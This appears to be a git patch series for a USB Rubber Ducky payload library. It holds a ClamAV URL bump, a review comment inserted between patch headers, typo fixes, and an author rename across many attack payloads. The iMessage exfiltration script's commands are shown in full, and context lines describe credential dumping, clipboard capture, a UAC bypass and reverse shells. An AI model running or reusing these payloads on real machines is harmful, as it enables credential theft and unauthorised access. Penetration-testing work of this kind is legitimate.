From b3c95f7b7dde81f7dad5384f016c43c959b02151 Mon Sep 17 00:00:00 2001
From: jbjb6000 <114012750+jbjb6000@users.noreply.github.com>
Date: Thu, 8 Feb 2024 18:01:26 -0500
Subject: [PATCH 1/4] Update payload.txt

Updated the zip file to point to the new version path.
---
 payloads/library/incident_response/GoodUSB/payload.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/incident_response/GoodUSB/payload.txt b/payloads/library/incident_response/GoodUSB/payload.txt
index 2347b64..c8d02c9 100644
--- a/payloads/library/incident_response/GoodUSB/payload.txt
+++ b/payloads/library/incident_response/GoodUSB/payload.txt
@@ -51,5 +51,5 @@ DELAY 4000
 LEFT
 ENTER
 DELAY 4000
-STRING mkdir $env:USERPROFILE\AppData\Local\Temp ; cd $env:USERPROFILE\AppData\Local\Temp ; Invoke-WebRequest -Uri https://www.clamav.net/downloads/production/clamav-0.105.0.win.x64.zip -OutFile clam.zip ; Expand-Archive -Force clam.zip ; del clam.zip ; cd clam\* ; mv .\conf_examples\freshclam.conf.sample freshclam.conf ; mv .\conf_examples\clamd.conf.sample clamd.conf ; Set-Content -Path "freshclam.conf" -Value (get-content -Path "freshclam.conf" | Select-String -Pattern 'Example' -NotMatch) ; Set-Content -Path "clamd.conf" -Value (get-content -Path "clamd.conf" | Select-String -Pattern 'Example' -NotMatch) ; Start-Process -Wait .\freshclam.exe ; Start-Process -NoNewWindow -Wait .\clamscan.exe "--memory --kill" ; cd $env:USERPROFILE\AppData\Local\Temp ; rmdir -R clam
+STRING mkdir $env:USERPROFILE\AppData\Local\Temp ; cd $env:USERPROFILE\AppData\Local\Temp ; Invoke-WebRequest -Uri https://www.clamav.net/downloads/production/clamav-1.3.0.win.x64.zip -OutFile clam.zip ; Expand-Archive -Force clam.zip ; del clam.zip ; cd clam\* ; mv .\conf_examples\freshclam.conf.sample freshclam.conf ; mv .\conf_examples\clamd.conf.sample clamd.conf ; Set-Content -Path "freshclam.conf" -Value (get-content -Path "freshclam.conf" | Select-String -Pattern 'Example' -NotMatch) ; Set-Content -Path "clamd.conf" -Value (get-content -Path "clamd.conf" | Select-String -Pattern 'Example' -NotMatch) ; Start-Process -Wait .\freshclam.exe ; Start-Process -NoNewWindow -Wait .\clamscan.exe "--memory --kill" ; cd $env:USERPROFILE\AppData\Local\Temp ; rmdir -R clam
 ENTER

From 8bc5dd096c416ae0f481f02b05962254919ec3e4 Mon Sep 17 00:00:00 2001
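Review bot: The new STRING line still hands whatever Invoke-WebRequest returned straight to Expand-Archive and then executes freshclam.exe and clamscan.exe from it, with no integrity check on the downloaded archive; bumping the URL to clamav-1.3.0 leaves that gap untouched. For an incident-response payload that runs a freshly downloaded binary on the examined host, compare the archive hash against the checksum published with the ClamAV release before expanding, e.g. insert `; if ((Get-FileHash clam.zip -Algorithm SHA256).Hash -ne '<EXPECTED_SHA256_PLACEHOLDER>') { del clam.zip ; exit }` between the Invoke-WebRequest and Expand-Archive steps, with the placeholder filled from the release's published checksum. Since the commit message says the old path had to be replaced, the version in the URL is likely to go stale again; a `REM` above the STRING line recording the ClamAV version and where its checksum was taken from would make the next bump a deliberate, verified change rather than a URL edit.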
From: Matthew Kayne <45180131+matthewkayne@users.noreply.github.com>
Date: Wed, 6 Mar 2024 20:34:11 +0000
Subject: [PATCH 2/4] Update payload.txt

Fixed spelling and grammar errors in the comments
---
 .../library/exfiltration/iMessage-Data-Grabber/payload.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt b/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt
index 4a9c00c..20ee796 100644
--- a/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt
+++ b/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt
@@ -13,12 +13,12 @@ STRING Terminal
 DELAY 200
 ENTER
 DELAY 200
-REM Change this command inside the brackets too any command that outputs text to the terminal
+REM Change this command inside the brackets to any command that outputs text to the terminal
 STRING x=$(curl ifconfig.me)
 DELAY 200
 ENTER
 DELAY 200
-REM Replace PHONE_NUMBER with you iMessage supported number (leave the @'s, they are required to run)
+REM Replace PHONE_NUMBER with your iMessage supported number (leave the @'s, they are required to run)
 STRING osascript -e 'tell application @Messages@ to send @'$x'@ to buddy @PHONE_NUMBER@'
 DELAY 100
 ENTER

From e606d300116e48272ebe4dbcc50fbab4475ccb1c Mon Sep 17 00:00:00 2001
From: Superuser2047 <160431987+Superuser2047@users.noreply.github.com>
Date: Sat, 11 May 2024 16:31:53 -0600
Subject: [PATCH 3/4] Update README.md

Fixed typo
---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 7e689d0..d2471bd 100644
--- a/README.md
+++ b/README.md
@@ -116,7 +116,7 @@ Core to its success is its simple language, DuckyScript™. Originally just thre ## DuckyScript 3.0 DuckyScript 3.0 is a feature rich, structured programming language. It includes all of the previously available commands and features of the original DuckyScript. -(DuckyScript 3.0 is backwards compatible with DuckyScript 1.0; this means all your favorite DuckyScript 1.0 paylaods are valid DuckyScript 3.0) +(DuckyScript 3.0 is backwards compatible with DuckyScript 1.0; this means all your favorite DuckyScript 1.0 payloads are valid DuckyScript 3.0) Additionally, DuckyScript 3.0 introduces [control flow constructs](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements "View Documentation"), [loops](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops "View Documentation"), [functions](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions "View Documentation"), [extensions](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions "View Documentation"). 
Plus, DuckyScript 3.0 includes many features specific to [keystroke injection](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection "View Documentation") attack/automation, such as [HID & Storage attack modes](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes "View Documentation"), OS Detection, [Keystroke Reflection](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#the-keystroke-reflection-attack "View Documentation") ([Video + Whitepaper](https://shop.hak5.org/pages/keystroke-reflection "Keystroke Reflection Video + Whitepaper")), [jitter](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter "View Documentation") and [randomization](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization "View Documentation") to name a few. From 40f7f072ea9fc428a9ef991b13c8e3e0838c99ed Mon Sep 17 00:00:00 2001 
From: 0i41E <79219148+0i41E@users.noreply.github.com>
Date: Tue, 28 May 2024 19:25:26 +0200
Subject: [PATCH 4/4] Changed Username

---
 payloads/extensions/community/DETECT_FINISHED | 2 +-
 .../extensions/community/POWERSHELL_DOWNLOAD | 2 +-
 .../community/ROLLING_POWERSHELL_EXECUTION | 2 +-
 .../community/WINDOWS11_CONSOLE_DOWNGRADE | 2 +-
 .../community/WINDOWS_ELEVATED_EXECUTION | 2 +-
 .../community/WINDOWS_FILELESS_HID_EXFIL | 2 +-
 .../credentials/BitLockerKeyDump/payload.txt | 10 +++++-----
 .../credentials/BitLockerKeyDump/readme.md | 2 +-
 .../library/credentials/SamDumpDucky/README.md | 4 ++--
 .../library/credentials/SamDumpDucky/payload.txt | 10 +++++-----
 .../WindowsLicenseKeyExfiltration.txt | 10 +++++-----
 .../WindowsLicenseKeyExfiltration/readme.md | 2 +-
 .../execution/DuckyHelper/DuckyHelper.txt | 2 +-
 .../exfiltration/ClipBoard-Creep/README.md | 6 +++---
 .../exfiltration/ClipBoard-Creep/payload.txt | 8 ++++----
 .../library/exfiltration/HashDumpDucky/README.md | 4 ++--
 .../exfiltration/HashDumpDucky/payload.txt | 2 +-
 .../library/general/EngagementDucky/readme.md | 6 +++---
 payloads/library/general/duckin8or/payload.txt | 2 +-
 payloads/library/prank/-RD-AcidBurn/README.md | 2 +-
 payloads/library/prank/-RD-JumpScare/README.md | 2 +-
 payloads/library/prank/EternalLock/payload.txt | 2 +-
 payloads/library/prank/SoundChangeDuck/README.md | 2 +-
 .../library/prank/SoundChangeDuck/payload.txt | 2 +-
 .../PingZhellDucky/PingZhellDucky.pl | 2 +-
 .../remote_access/PingZhellDucky/README.md | 16 ++++++++--------
 .../remote_access/PingZhellDucky/payload.txt | 4 ++--
 .../remote_access/ReverseDucky/ReverseDucky.txt | 2 +-
 .../ReverseDuckyII/ReverseDuckyII.txt | 2 +-
 .../remote_access/ReverseDuckyIII/payload.txt | 2 +-
 .../ReverseDuckyPolymorph/README.md | 6 +++---
 .../ReverseDuckyPolymorph/payload.txt | 2 +-
 .../remote_access/ReverseDuckyUltimate/README.md | 16 ++++++++--------
 .../ReverseDuckyUltimate/payload.txt | 12 ++++++------
 34 files changed, 77 insertions(+), 77
deletions(-) diff --git a/payloads/extensions/community/DETECT_FINISHED b/payloads/extensions/community/DETECT_FINISHED index 3af4600..75fc23c 100644 --- a/payloads/extensions/community/DETECT_FINISHED +++ b/payloads/extensions/community/DETECT_FINISHED @@ -1,6 +1,6 @@ EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: diff --git a/payloads/extensions/community/POWERSHELL_DOWNLOAD b/payloads/extensions/community/POWERSHELL_DOWNLOAD index 9e67d3b..3b50b52 100644 --- a/payloads/extensions/community/POWERSHELL_DOWNLOAD +++ b/payloads/extensions/community/POWERSHELL_DOWNLOAD @@ -1,6 +1,6 @@ EXTENSION POWERSHELL_DOWNLOAD REM VERSION 1.0 - REM Author: 0iphor13 + REM Author: 0i41E REM Downloads the desired file via powershell REM Use the method you want to use, via the specific function, define the URL and the output. diff --git a/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION b/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION index 2738fa7..e64dae1 100644 --- a/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION +++ b/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION @@ -1,6 +1,6 @@ EXTENSION ROLLING_POWERSHELL_EXECUTION REM VERSION 1.0 - REM Author: 0iphor13 + REM Author: 0i41E REM OS: Windows REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek REM Requirements: PayloadStudio v.1.3 minimum diff --git a/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE b/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE index 41df572..230b58d 100644 --- a/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE +++ b/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE @@ -1,7 +1,7 @@ EXTENSION WINDOWS11_CONSOLE_DOWNGRADE REM_BLOCK Version: 1.0 - Author: 0iphor13 + Author: 0i41E Description: Downgrade the default command prompt of Windows 11 to use Conhost again. Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again. END_REM 
diff --git a/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION b/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION index 9e817e0..419b6e7 100644 --- a/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION +++ b/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION @@ -1,6 +1,6 @@ EXTENSION WINDOWS_ELEVATED_EXECUTION REM VERSION 1.1 - REM Author: 0iphor13 + REM Author: 0i41E REM Executes the desired program with elevated privileges REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts REM additional extensions diff --git a/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL b/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL index 597325b..a0cada8 100644 --- a/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL +++ b/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL @@ -1,6 +1,6 @@ EXTENSION WINDOWS_FILELESS_HID_EXFIL REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION Extension for Keystroke Reflection data exfiltration without putting files on disk. diff --git a/payloads/library/credentials/BitLockerKeyDump/payload.txt b/payloads/library/credentials/BitLockerKeyDump/payload.txt index cee6125..aedd6b4 100644 --- a/payloads/library/credentials/BitLockerKeyDump/payload.txt +++ b/payloads/library/credentials/BitLockerKeyDump/payload.txt @@ -1,7 +1,7 @@ REM BitLockerKeyDump REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0 REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection @@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT END_REM END_EXTENSION -REM Extension made by 0iphor13 to signalize the payloads end +REM Extension made by 0i41E to signalize the payloads end EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: 
@@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED END_FUNCTION END_EXTENSION -REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys +REM Extension made by 0i41E for fileless exfiltration via Lock Keys EXTENSION WINDOWS_FILELESS_HID_EXFIL REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION Extension for Keystroke Reflection data exfiltration without putting files on disk. diff --git a/payloads/library/credentials/BitLockerKeyDump/readme.md b/payloads/library/credentials/BitLockerKeyDump/readme.md index 7fd6559..5a7bc76 100644 --- a/payloads/library/credentials/BitLockerKeyDump/readme.md +++ b/payloads/library/credentials/BitLockerKeyDump/readme.md @@ -1,6 +1,6 @@ **Title: BitLockerKeyDump** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.0
diff --git a/payloads/library/credentials/SamDumpDucky/README.md b/payloads/library/credentials/SamDumpDucky/README.md index 384a32e..e1e8ef2 100644 --- a/payloads/library/credentials/SamDumpDucky/README.md +++ b/payloads/library/credentials/SamDumpDucky/README.md @@ -1,6 +1,6 @@ **Title: SamDumpDucky** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 2.0
@@ -23,4 +23,4 @@ Afterwards you can use a tool like pypykatz to extract the users hashes.

**!Disclaimer! samdump2 has proven to be unreliable in the recent past.** -![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) +![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) diff --git a/payloads/library/credentials/SamDumpDucky/payload.txt b/payloads/library/credentials/SamDumpDucky/payload.txt index 2c501e0..cb74144 100644 --- a/payloads/library/credentials/SamDumpDucky/payload.txt +++ b/payloads/library/credentials/SamDumpDucky/payload.txt @@ -1,6 +1,6 @@ REM Title: SamDumpDucky REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes. -REM Author: 0iphor13 +REM Author: 0i41E REM Version: 2.0 REM Category: Credentials REM Attackmodes: HID, Storage @@ -36,10 +36,10 @@ EXTENSION DETECT_READY CAPSLOCK END_EXTENSION -REM Extension made by 0iphor13 to automate elevated execution of powershell - Change language layout within here +REM Extension made by 0i41E to automate elevated execution of powershell - Change language layout within here EXTENSION WINDOWS_ELEVATED_EXECUTION REM VERSION 1.1 - REM Author: 0iphor13 + REM Author: 0i41E REM Executes the desired program with elevated privileges REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts REM additional extensions @@ -71,10 +71,10 @@ EXTENSION WINDOWS_ELEVATED_EXECUTION END_EXTENSION -REM Extension by 0iphor13, to signalize the successful execution of the payload +REM Extension by 0i41E, to signalize the successful execution of the payload EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: 
diff --git a/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt b/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt index 6447a73..1837442 100644 --- a/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt +++ b/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt @@ -1,7 +1,7 @@ REM WindowsLicenseKeyExfiltration REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0 REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry. @@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT END_REM END_EXTENSION -REM Extension made by 0iphor13 to signalize the payloads end +REM Extension made by 0i41E to signalize the payloads end EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: @@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED END_FUNCTION END_EXTENSION -REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys +REM Extension made by 0i41E for fileless exfiltration via Lock Keys EXTENSION WINDOWS_FILELESS_HID_EXFIL REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION Extension for Keystroke Reflection data exfiltration without putting files on disk. diff --git a/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md b/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md index 794ae2d..fda20ba 100644 --- a/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md +++ b/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md @@ -1,6 +1,6 @@ **Title: WindowsLicenseKeyExfiltration** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.0
diff --git a/payloads/library/execution/DuckyHelper/DuckyHelper.txt b/payloads/library/execution/DuckyHelper/DuckyHelper.txt index 6fc6557..26d3023 100644 --- a/payloads/library/execution/DuckyHelper/DuckyHelper.txt +++ b/payloads/library/execution/DuckyHelper/DuckyHelper.txt @@ -1,7 +1,7 @@ REM DuckyHelper REM Version 1.0 REM OS: Windows 10 -REM Author: 0iphor13 +REM Author: 0i41E REM UAC bypass for privilege escalation (Method FodHelper) REM AV will notify, but payload will still be executed diff --git a/payloads/library/exfiltration/ClipBoard-Creep/README.md b/payloads/library/exfiltration/ClipBoard-Creep/README.md index 67cc32b..58ecdef 100644 --- a/payloads/library/exfiltration/ClipBoard-Creep/README.md +++ b/payloads/library/exfiltration/ClipBoard-Creep/README.md 
@@ -6,12 +6,12 @@ Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrat ### #HOOK ### Define your webhook under #HOOK -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png) ### #CALLBACK_DELAY ### Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers. -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png) After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook. -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png) diff --git a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt index a9a01dc..7851df7 100644 --- a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt +++ b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt 
@@ -1,10 +1,10 @@ REM Clipboard-Creep REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server. -REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep +REM Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep EXTENSION PASSIVE_WINDOWS_DETECT @@ -52,7 +52,7 @@ END_EXTENSION EXTENSION EXTENSION Rolling_Powershell_Execution REM VERSION 1.0 - REM Author: 0iphor13 + REM Author: 0i41E REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek REM Requirements: PayloadStudio v.1.3 minimum REM Starts Powershell in uncommon ways to avoid basic detection @@ -132,7 +132,7 @@ END_EXTENSION EXTENSION Detect_Finished REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: diff --git a/payloads/library/exfiltration/HashDumpDucky/README.md b/payloads/library/exfiltration/HashDumpDucky/README.md index 9e7171c..9c97e74 100644 --- a/payloads/library/exfiltration/HashDumpDucky/README.md +++ b/payloads/library/exfiltration/HashDumpDucky/README.md @@ -1,6 +1,6 @@ **Title: HashDumpDucky** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Requirements: DuckyScript 3.0
Version: 1.0

@@ -17,6 +17,6 @@ Bring some time... This payload will run an obfuscated script to dump user hashe Compile this payload with payloadstudio, place it inside of your Ducky as inject.bin and you are good to go # Exfiltrate the out.txt file and try to crack the hashes. -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/HashDumpDucky/hash.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/HashDumpDucky/hash.png) *props to Nikhil Mittal* diff --git a/payloads/library/exfiltration/HashDumpDucky/payload.txt b/payloads/library/exfiltration/HashDumpDucky/payload.txt index f6e8156..56361c9 100644 --- a/payloads/library/exfiltration/HashDumpDucky/payload.txt +++ b/payloads/library/exfiltration/HashDumpDucky/payload.txt @@ -1,7 +1,7 @@ REM HashDumpDucky REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Requirements: RubberDucky mk2/DuckyScript 3.0 REM PoC of dumping hashes, filtering for the Administrator hash and exfiltration via keystroke reflection. diff --git a/payloads/library/general/EngagementDucky/readme.md b/payloads/library/general/EngagementDucky/readme.md index 18fbf67..f373412 100644 --- a/payloads/library/general/EngagementDucky/readme.md +++ b/payloads/library/general/EngagementDucky/readme.md @@ -1,6 +1,6 @@ **Title: EngagementDucky** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Requirements: DuckyScript 3.0
Version: 1.0

@@ -10,7 +10,7 @@ Version: 1.0

EngagementDucky will help you generating your evidence. Typical proof of compromise is normally something harmless like a message in notepad on your targets machine. This payload will pop a message box, containing Username, Hostname, Time and Date. Afterwards Ducky will generate a screenshot of this message box and will save it. Afterwards you can walk away. Combine this with specific USB identifiers to help identifying you.
Step up your game and demonstrate impact in a few seconds without leaving your scope.

-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/usbidentifiers.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/usbidentifiers.png) **Instruction:** 1. Configure USB identifiers @@ -18,4 +18,4 @@ Step up your game and demonstrate impact in a few seconds without leaving your s 2. Place inject.bin onto your Ducky 3. Plug in your Ducky and wait until finish... walk away -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/proofpic.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/proofpic.png) diff --git a/payloads/library/general/duckin8or/payload.txt b/payloads/library/general/duckin8or/payload.txt index 938b518..ae6eb79 100644 --- a/payloads/library/general/duckin8or/payload.txt +++ b/payloads/library/general/duckin8or/payload.txt @@ -54,7 +54,7 @@ REM # * Be responsible. REM # # REM # Kudos: # REM # * RootJunky - "Three Payloads from LOCK Key Double Press" # -REM # * 0iphor13 - "EngagementDucky", "ReverseDuckyII" # +REM # * 0i41E - "EngagementDucky", "ReverseDuckyII" # REM # * the-jcksn - "ducky_crab" # REM # * I am Jakoby - "-RD-PineApple" # REM # * Hak5 Team # diff --git a/payloads/library/prank/-RD-AcidBurn/README.md b/payloads/library/prank/-RD-AcidBurn/README.md index 8414320..77808ba 100644 --- a/payloads/library/prank/-RD-AcidBurn/README.md +++ b/payloads/library/prank/-RD-AcidBurn/README.md @@ -105,7 +105,7 @@ Arf * [Hak5](https://hak5.org/) * [MG](https://github.com/OMG-MG) -* [0iphor13](https://github.com/0iphor13) +* [0i41E](https://github.com/0i41E) * [PhilSutter](https://github.com/PhilSutter) diff --git a/payloads/library/prank/-RD-JumpScare/README.md b/payloads/library/prank/-RD-JumpScare/README.md index 3781747..53ef0dc 100644 
--- a/payloads/library/prank/-RD-JumpScare/README.md +++ b/payloads/library/prank/-RD-JumpScare/README.md @@ -95,7 +95,7 @@ Arf * [Hak5](https://hak5.org/) * [MG](https://github.com/OMG-MG) -* [0iphor13](https://github.com/0iphor13) +* [0i41E](https://github.com/0i41E) * [PhilSutter](https://github.com/PhilSutter) diff --git a/payloads/library/prank/EternalLock/payload.txt b/payloads/library/prank/EternalLock/payload.txt index 2aaee31..bf5eeef 100644 --- a/payloads/library/prank/EternalLock/payload.txt +++ b/payloads/library/prank/EternalLock/payload.txt @@ -1,7 +1,7 @@ REM EternalLock REM Version 1.0 REM OS: Windows / Unix -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0 REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out) diff --git a/payloads/library/prank/SoundChangeDuck/README.md b/payloads/library/prank/SoundChangeDuck/README.md index 40617b8..3b6450c 100644 --- a/payloads/library/prank/SoundChangeDuck/README.md +++ b/payloads/library/prank/SoundChangeDuck/README.md @@ -1,6 +1,6 @@ **Title: SoundChangeDuck** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.0

diff --git a/payloads/library/prank/SoundChangeDuck/payload.txt b/payloads/library/prank/SoundChangeDuck/payload.txt index 5ad9118..215d76f 100644 --- a/payloads/library/prank/SoundChangeDuck/payload.txt +++ b/payloads/library/prank/SoundChangeDuck/payload.txt @@ -1,7 +1,7 @@ REM SoundChangeDuck REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Nothing special, something cheap. Changes the sound of device connection from Hardware Insert to Hardware fail. REM You can of course decide which system sounds you want to change. diff --git a/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl b/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl index d4a64c3..5ee0755 100644 --- a/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl +++ b/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl @@ -15,7 +15,7 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . # -# Modified by 0iphor13 for PingZhellDucky +# Modified by 0i41E for PingZhellDucky # # # diff --git a/payloads/library/remote_access/PingZhellDucky/README.md b/payloads/library/remote_access/PingZhellDucky/README.md index 51cfea5..305749b 100644 --- a/payloads/library/remote_access/PingZhellDucky/README.md +++ b/payloads/library/remote_access/PingZhellDucky/README.md @@ -1,6 +1,6 @@ **Title: PingZhellDucky** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows & Unix
Version: 1.2
Requirements: DuckyScript 3.0, perl

@@ -20,16 +20,16 @@ After PingZhellCable and PingZhellBunny, PingZhellDucky released. But what is di With automatic setup: Define INSTALL and set it to TRUE & Leave CLIENTLINK with default or choose your own -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setupauto.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setupauto.png) Define the IP of your attacking machine between the quotes at the ATTACKER section -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png) Open up a terminal and put it into focus. Insert the Ducky into your non-Windows attack machine - wait for it to finish setup (Linux recommended - Perl required!) -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setup.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setup.png) Start the client -> `perl PingZhellDucky.pl` -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)

Plug your Ducky into a Windows target.
Achieve reverse shell.
@@ -38,7 +38,7 @@ Achieve reverse shell.
 **Instruction Version 2:** Without automatic setup: Define INSTALL and set it to FALSE
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png)
 Upload PingZhellDucky.pl onto your attacking machine. Install dependencies, if needed:
